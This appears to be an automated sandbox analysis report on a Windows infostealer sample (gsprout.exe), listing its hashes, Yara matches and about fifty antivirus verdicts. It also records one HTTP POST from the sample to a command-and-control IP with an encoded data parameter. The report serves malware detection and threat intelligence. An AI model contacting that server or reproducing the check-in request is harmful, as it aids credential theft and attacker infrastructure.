Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 17, 2024, 10:11 p.m.	Aug. 17, 2024, 10:16 p.m.

Size	278.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`92ae7a1286d992e104c0072f639941f7`
SHA256	`1771c4e6e34fda6a68c7b1d980cc3dffbe587c651f985bf7235c6af9a8904fd3`
CRC32	`25023756`
ssdeep	`6144:S7iHIcfYlXolTFsr91vzWmUuNTuBjEKz7nwWYcEZoSNDyaN9b/7:FPYJolZsr9kjuNTuVFfnwHYSNGOb/7`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

gsprout.exe "C:\Users\test22\AppData\Local\Temp\gsprout.exe"
2552

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
45.138.16.71	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, Connection to IP address

suspicious_request

POST http://45.138.16.71/cfg/?data=IDaJhCHdIlfHcldJAISHfgpYzZhgReLDAihcV0Oa

Performs some HTTP requests (1 event)

request

POST http://45.138.16.71/cfg/?data=IDaJhCHdIlfHcldJAISHfgpYzZhgReLDAihcV0Oa

Sends data using the HTTP POST Method (1 event)

request

POST http://45.138.16.71/cfg/?data=IDaJhCHdIlfHcldJAISHfgpYzZhgReLDAihcV0Oa

Communicates with host for which no DNS query was performed (1 event)

host

45.138.16.71

File has been identified by 51 AntiVirus engines on VirusTotal as malicious (50 out of 51 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
ALYac	Gen:Variant.Fragtor.477179
Cylance	Unsafe
VIPRE	Gen:Variant.Fragtor.477179
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005a93841 )
BitDefender	Gen:Variant.Fragtor.477179
K7GW	Trojan ( 005a93841 )
Cybereason	malicious.286d99
Arcabit	Trojan.Fragtor.D747FB
VirIT	Trojan.Win32.Genus.UZD
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Kryptik_AGen.BZS
APEX	Malicious
Avast	Win32:CrypterX-gen [Trj]
ClamAV	Win.Packed.Zudochka-9811754-0
Kaspersky	HEUR:Trojan-PSW.Win32.Stealer.gen
NANO-Antivirus	Trojan.Win32.Stealer.khgikm
MicroWorld-eScan	Gen:Variant.Fragtor.477179
Rising	Stealer.Agent!8.C2 (TFE:5:XxsjwueTduU)
Emsisoft	Gen:Variant.Fragtor.477179 (B)
DrWeb	Trojan.PWS.Siggen3.35329
Zillya	Trojan.Stealer.Win32.141843
McAfeeD	ti!1771C4E6E34F
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.92ae7a1286d992e1
Sophos	ML/PE-A
SentinelOne	Static AI - Suspicious PE
Jiangmin	Trojan.PSW.Stealer.dcp
Google	Detected
MAX	malware (ai score=89)
Antiy-AVL	Trojan/Win32.Kryptik
Gridinsoft	Susp.U.XOREncoded.sd!yf
Microsoft	Trojan:Win32/Predator.SN!MTB
ZoneAlarm	HEUR:Trojan-PSW.Win32.Stealer.gen
GData	Gen:Variant.Fragtor.477179
AhnLab-V3	Trojan/Win.Taurus.R638921
BitDefenderTheta	AI:Packer.6C373D651F
TACHYON	Trojan-PWS/W32.InfoStealer.285184
DeepInstinct	MALICIOUS
VBA32	TrojanPSW.Stealer
Malwarebytes	Malware.AI.2375620336
Ikarus	Trojan-Spy.GlorySprout
Tencent	Malware.Win32.Gencirc.10c01cff
Yandex	Trojan.Kryptik_AGen!b1bRMJJ28VU
huorong	TrojanSpy/PassStealer.s
MaxSecure	Trojan.Malware.73788987.susgen
AVG	Win32:CrypterX-gen [Trj]

gsprout.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All